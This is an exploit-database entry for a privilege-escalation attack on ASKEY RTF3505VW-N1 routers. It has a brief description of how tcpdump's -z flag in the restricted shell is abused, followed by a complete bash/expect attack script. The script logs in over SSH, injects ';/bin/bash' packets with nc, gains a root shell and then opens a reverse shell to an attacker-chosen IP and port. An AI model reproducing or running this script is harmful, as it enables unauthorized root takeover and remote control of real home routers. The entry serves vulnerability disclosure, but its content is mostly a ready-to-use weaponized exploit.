Exploit for ASKEY RTF3505VW-N1 - Privilege Escalation

Name: Exploit for ASKEY RTF3505VW-N1 - Privilege Escalation
Rating: 5 (67 reviews)
2023-03-31 | CVSS 7.4
## https://sploitus.com/exploit?id=EDB-ID:51155
# Exploit Title: ASKEY RTF3505VW-N1 - Privilege escalation
# Date: 07-12-2022
# Exploit Author: Leonardo Nicolas Servalli
# Vendor Homepage: www.askey.com
# Platform: ASKEY router devices RTF3505VW-N1
# Tested on: Firmware BR_SV_g000_R3505VMN1001_s32_7
# Vulnerability analysis: https://github.com/leoservalli/Privilege-escalation-ASKEY/blob/main/README.md

#Description:
#----------

# Mitrastar ASKEY RTF3505VW-N1 devices are provided with access through ssh into a restricted default shell (credentials are on the back of the router and in some cases this routers use default credentials).

# The command “tcpdump” is present in the restricted shell and do not handle correctly the -z flag, so it can be used to escalate privileges through the creation of a local file in the /tmp directory of the router, and injecting packets through port 80 used for the router's Web GUI) with the string ";/bin/bash" in order to be executed by "-z sh". By using “;/bin/bash” as injected string we can spawn a busybox/ash console.

#Exploit:
#--------
#!/usr/bin/bash

if [ -z "$@" ]; then 
	echo "Command example: $0 routerIP routerUser routerPassword remoteIPshell remotePortShell "
	exit 0
fi

for K in $(seq 1 15) 	# Attemps 
do

echo "**************************************************************************************"
echo "******************************** Attempt number $K ************************************"
echo "**************************************************************************************"

for l in $(seq 1 200) ; do echo ";/bin/bash" | nc -p 8888 $1 80 ; done > /dev/null 2>&1 &	# start a background loop injecting the string ";/bin/bash" on the port 80 of the router

# Expect script for interact with the router through SSH, login, launch the tcpdump with the option "-z sh", and finally launch a more stable busybox reverse shell to our listener
/usr/bin/expect << EOD
	spawn ssh $2@$1
	expect 	{
		"password: " {
		send "$3\r"
		expect ">"
		send -- "tcpdump -v -ln -i any -w /tmp/runme$K -W 1 -G 1 -z sh src port 8888\r"		# filter by source port 8888
		}
		"yes/no" {
		send "yes\r"
		#exp_continue
		}
	}
	set timeout 2
	expect 	{
    		timeout {
        	puts "Timeout..."
        	send "exit\r"
        	exit 0
	    	}

		"*usy*ox" {
	        expect "#"
	        send "rm /tmp/runme* \r"
		send "rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f | /bin/sh -i 2>&1|nc $4 $5 >/tmp/f \r"
	        puts "Rooted !!!!!!!!!"
	        set timeout -1
	        expect "NEVER_APPEARING_STRING#"            # wait an infinite time to mantain the rverse shell open
		}
	}
EOD

done